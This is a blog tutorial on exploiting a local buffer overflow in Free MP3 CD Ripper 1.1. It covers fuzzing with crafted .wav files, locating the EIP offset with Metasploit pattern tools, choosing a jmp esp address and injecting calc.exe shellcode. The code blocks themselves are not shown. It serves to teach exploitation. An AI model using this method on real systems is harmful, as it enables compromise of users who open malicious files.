Since I am still getting deeper into penetration tests in AppSec, it helps quite a lot to write about things to get new ideas and thoughts - so I decided to write a little tutorial on how a buffer overflow basically works using a real world example. There has been posted a local buffer overflow over at Exploit-DB which I will recreate in a slightly different way: “Free MP3 CD Ripper 1.1 Local Buffer Overflow” (http://www.exploit-db.com/exploits/17727). I will improve my exploit in further articles, so do not panic about the unreliable way at the moment ;-). This vulnerability is quite easy to understand and therefor a nice target to learn how things work. I am not yet familiar with shellcoding at all, so I decided to use and inject a shellcode made by the Metasploit Framework Team for first. By the way I assume you have some basic knowledge of your x86 architecture, debugging with your favorite Debugger (I like IDA :-) ), and at least some knowledge in Python which is not needed as you can write your scripts in any other language too, but it’s a nice and quick scripting-language.
So let’s get to work!
The application is vulnerable to a local buffer overflow, which means that malformed local input could lead to an exploitation and therefor misbehavior of the application and could also lead to a system compromise when using the right shellcode and the application is run by an administrator.
Let’s fire up the application and see how it will behave if you input a random .wav file, using a small Python - Script, which simply creates a .wav file containing 2500 A’s (by the way, this method of penetration testing in AppSec is also called “fuzzing”):
Open the file using the Convert-Wizard and see what happens….
Surprise ? Nothing ?! Uhm !! That’s crazy, why does nothing happen even if we do not have a correct .wav-header and only a bunch of A’s (“\x41” - have a look at www.asciitable.com ) ? Easy to say: The buffer of the application is big enough to handle 2500 A’s! Ok next logical step: Let’s create a .wav that’s larger than 2500 A’s. Use the script above and increment the value of the A’s to 5000. Open up the target again and use the wizard to convert our bad .wav file.
Ahh, now it’s working. The application dies silently and without an error message. Looks like we have crashed the application using 5000 A’s.
Now let’s have a deeper look at this bug. Start the application again, launch your favorite debugger, in my example the powerful IDA, attach it to the running process of the application:
…and open our .wav file again. It crashes again, but now the debugger jumps in:
The interesting thing you recognize here is the error message saying that the instruction at “0x41414141” referenced memory, which cannot be read. And if you have a look at our small Python script again, you see that it looks like the application tries to execute something within our malicious .wav file, which only consists of “\x41” bytes. Interesting so far. (You can try this using other chars too of course, try to put some “\x42” in, and have a look how this message changes). Have a look at the registers during the crash:
What you can see here is that some of our registers have been overwritten by our malicious .wav file including the most important - the EIP aka the instruction pointer. So if you have the possibility to put in your own piece of junk or code to overwrite the EIP, it crashes here, because “41414141” is not a valid address. That’s the reason why the application is being interrupted by the debugger. If you have a look down at the Stack view, you see that enormous parts of the stack including some registers like the EBX and the EIP have been overwritten. Good for us, bad for the application and the security of the user running the malicious .wav file. Having control over parts of the registers especially the EIP is a enormous benefit, because you can simply point the EIP to somewhere else!
The next step is to find out at which position exactly we have overwritten the EIP. There are basically two ways. The most unreliable: You can try to overwrite the whole memory space using your desired EIP, but you cannot say if you exactly “hit” the address of the EIP and beside this it looks badly. The other more practicable way is to use a nice Ruby script in the Metasploit Framwork, called “pattern_create.rb” which creates unique patterns to use for such kinds of attacks:
Just enter your desired amount of junk as an argument to the script and it shows you some unique output. As we know, that our application crashes somewhere between 2500 and 5000 A’s we have to take the max value here.
Just modify the Python-Script as shown below:
Now we’ve got a malicious .wav file with a lot of different chars, which helps us to find the exact location of the EIP. Use our application to open the new .wav file, and you’ll see the application crashing again:
But this time with a different message! And that’s our unique pattern ! You can also have a look at the detailed stack view, where you can find the new EIP too. Now we’re going to use another nice script, provided - again - by the Metasploit Framework called “pattern_offset.rb”. Simply enter the memory reference as argument #1 and our pattern length as argument #2:
Great output! This means our malicious .wav file overwrites the EIP directly after position 4112 within the .wav file. Now we can modify our Python - Script again to verify if this output is correct:
This script first puts in 4112 A’s followed by our 4 bytes EIP represented through some B’s (“\x42”). Open the new .wav, and you’ll get a new warning from IDA:
This means, the provided offset is correct, now we have exact knowledge and control over the EIP, which gets overwritten after exactly 4112 A’s :-) If you have a closer look at the Stack view in IDA you’ll recognize that we’re right!
Next step: we have to find a suitable place for our code to inject. Add some pseudo shellcode after the junks and our EIP, like:
Open the .wav and have a look at the IDA Stackview:
Here you can first see our bunch of “\x41” junks, followed by our potential EIP overwritten by “\x42” and followed by our pseudo Shellcode in Little Endian notation, which basically means, it gets reversed in the stack.
Now we just have to put our shellcode in and jump to the current ESP. This can be realized by the commonly used “jmp esp” command which is - translated to opcode language - “FF E4”.
So all we have to do is to find an existing “FF E4” within the loaded application, where we can put our EIP to. Take a look at the output window of IDA:
That’s a list of already loaded .dlls where we can search for a “FF E4”. The first column shows where exactly the .dll file gets loaded into memory. As you can see, you have basically two types of loaded .dlls here. First: System-based .dlls like e.g. msctf.dll whose code you will find starting at “746A0000” and Application-based .dlls like “C:\Programme\Free MP3 CD Ripper\libsamplerate.dll”. The most important difference between a “jmp esp” using a system and a application .dll is the version and availability. You can not ensure that you’ll have exactly the same version of the loaded system.dll on each Windows systems like XP, 2003 or 7. It’s truly possible that the version and hence the position of our “jmp esp” is different and the exploit won’t work. So the most reliable way is to use a reference within an application .dll because those won’t ever change.
But at this point I’ll take a “jmp esp” from one Windows.dll because there is no reliable “jmp esp” ( all “jmp esp”s have a null in their address) the loaded dlls:
The problem is you need a reliable location regarding the little endian notation, which means you have to be careful using addresses which contain null bytes - well you better should avoid them completely because the null represents a string terminator which would make a nice address probably useless at all if there is a null byte within the address. One exception: if the first byte of the address is a null, you’ve got no problem because you will “little endian” the address, so the null byte will be reversed to the end of the address. So let’s take the highlighted address and little endian it using the pack-function in Python:
Let’s put one break “\xcc”, some nops “\x90” and a pseudo-shellcode to make the stack view look a bit more clearly and see if the ESP points to exactly the position after our EIP. Attach your debugger to the running application and convert the malicious .wav file. Have a look at the Stack view:
Here you can clearly see that our new EIP has been successfully overwritten using our stolen address from WMVCore.dll, followed by the break and the nops and after that the bytes “\x41\x42\x43\x44\x45” which represent the pseudo_shellcode. ESP starts at “0x1BFFEE8”, which means not directly after the EIP, so we have to fill the gap using 3 further nops (excluding the “\xcc”) after the EIP.
Now we have to put in some real shellcode. Let’s take one from Metasploit Framework again, which simply launches the calc.exe:
and using this shellcode we could finalize our Python Script:
Now launch the application again, load our malicious .wav file, and et voila, it still closes itself, but then launches the famous calc.exe :-)
Great! We’ve just exploited a vulnerability.
There are a few other ways of exploiting this vulnerability. So expect to read more about exploiting soon :-)xpect to read more about exploiting soon :-)